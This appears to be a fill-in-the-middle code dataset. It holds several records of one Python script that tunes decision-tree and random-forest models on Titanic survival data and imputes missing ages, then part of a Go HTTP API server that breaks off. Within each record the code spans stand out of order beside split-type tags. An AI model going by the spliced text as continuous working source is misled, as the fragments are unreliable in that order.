31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
""" | random_line_split | |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_d | # Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| ata_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
| conditional_block |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def find | """ findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| RFBestDepth():
| identifier_name |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" | Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# | identifier_body |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
